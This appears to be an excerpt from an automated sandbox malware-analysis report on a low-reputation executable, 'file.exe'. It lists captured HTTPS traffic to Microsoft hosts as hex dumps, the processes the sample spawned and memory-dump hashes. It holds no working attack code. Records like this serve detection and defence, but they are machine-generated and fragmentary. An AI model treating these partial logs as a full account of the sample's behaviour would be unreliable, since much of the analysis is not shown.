                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:55 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                Host: wcpstatic.microsoft.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-11-24 02:04:56 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:55 GMT
                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                Content-Length: 52717
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                Age: 25161
                                                                                                                                                                                                Cache-Control: max-age=43200
                                                                                                                                                                                                Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-request-id: ae9d672f-401e-00c3-76da-3dd985000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-azure-ref: 20241124T020455Z-178bfbc474bwlrhlhC1NYCy3kg000000059g00000000bs16
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:56 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                2024-11-24 02:04:56 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                                Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                                2024-11-24 02:04:56 UTC16384INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                                Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                                2024-11-24 02:04:56 UTC81INData Raw: 65 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74
                                                                                                                                                                                                Data Ascii: ementById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<argument
                                                                                                                                                                                                2024-11-24 02:04:56 UTC4197INData Raw: 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 29 3a 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 22 2b 74 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 2e 63 61 6c 6c 28 65 29 7d 29 29 7d 2c 65 2e 63 6f 6f 6b 69 65 4e 61 6d 65 3d 22 4d 53 43 43 22 2c
                                                                                                                                                                                                Data Ascii: s.length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEventListener(t,o):e.attachEvent("on"+t,(function(){o.call(e)}))},e.cookieName="MSCC",


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                30192.168.2.5498114.175.87.197443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:05:05 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O+PWlvUr11LBdsr&MD=VdRA74wY HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                                                2024-11-24 02:05:06 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                MS-CorrelationId: bd26610a-8cdb-496f-9a0d-04fe678bead5
                                                                                                                                                                                                MS-RequestId: ca1575e2-dd38-4185-b83b-e9280b494909
                                                                                                                                                                                                MS-CV: Y2mR3tIs2kSqy9li.0
                                                                                                                                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:05:05 GMT
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 30005
                                                                                                                                                                                                2024-11-24 02:05:06 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                2024-11-24 02:05:06 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:21:04:03
                                                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                Imagebase:0x560000
                                                                                                                                                                                                File size:1'836'032 bytes
                                                                                                                                                                                                MD5 hash:88A2E1DC5F57311DC42A7D57DC7D9827
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                Start time:21:04:39
                                                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                Imagebase:0x7ff715980000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                Start time:21:04:39
                                                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1712,i,16499392452807308267,17586683353551675273,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                Imagebase:0x7ff715980000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:21:04:42
                                                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                Imagebase:0x7ff715980000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                Start time:21:04:43
                                                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2012,i,16342311137299287003,18054011809701615545,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                Imagebase:0x7ff715980000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Reset < >
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Offset: 012AA000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_3_12aa000_file.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b3f4910196f05a250e58b8a418feeced0b899f3c425b98774a7479b514310896
                                                                                                                                                                                                  • Instruction ID: 6b829e97c97251d7ce85c482d01cf20be0d34693fad32851df0ea0879c331136
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3f4910196f05a250e58b8a418feeced0b899f3c425b98774a7479b514310896
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F02CC9684E3C10FDB178B740D7A590BF70AE2355471E86CFC9C68F8A3E249994AD363
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000003.2358730980.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Offset: 012FC000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_3_12fc000_file.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: fd1a20a3a82e7af8ad0250e7f64e17d2ac8509fbb3f14cebbabeb4e09e9c25e8
                                                                                                                                                                                                  • Instruction ID: cfb60b8d425755e26d3cf4fec53da3b8d9053f16c2ae3d12099cf390c21fffce
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd1a20a3a82e7af8ad0250e7f64e17d2ac8509fbb3f14cebbabeb4e09e9c25e8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC910F6500F7C19FC3138BB45964A957FB06F03128F2E8AEBC184DF4B3D6594A4AC762